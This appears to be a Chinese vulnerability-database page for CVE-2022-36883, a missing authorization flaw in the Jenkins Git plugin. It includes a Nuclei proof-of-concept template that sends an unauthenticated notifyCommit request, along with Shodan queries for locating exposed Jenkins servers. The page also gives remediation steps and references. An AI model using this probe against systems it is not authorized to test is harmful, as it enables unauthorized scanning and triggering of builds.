CVE-2022-36883: Jenkins Git <=4.11.3 - Missing Authorization

日期: 2025-08-01 | 影响软件: Jenkins Git | POC: 已公开

漏洞描述

Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2022-36883

info:
  name: Jenkins Git <=4.11.3 - Missing Authorization
  author: c-sh0
  severity: high
  description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin.
  remediation: |
    Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability.
  reference:
    - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36883
    - http://www.openwall.com/lists/oss-security/2022/07/27/1
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36883
    cwe-id: CWE-862
    epss-score: 0.69381
    epss-percentile: 0.98604
    cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: jenkins
    product: git
    framework: jenkins
    shodan-query:
      - X-Jenkins
      - x-jenkins
  tags: cve,cve2022,jenkins,plugin,git,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "repository:"
          - SCM API plugin
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205f3d29b639b524cdf68fa71a8b0115532ab4753cfd1cbe3d025ec77b0f9cfe960220658f3f4fd4fec668b5159d076c1ac27e0f6139757e302600cd447bb0f92bdb8d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐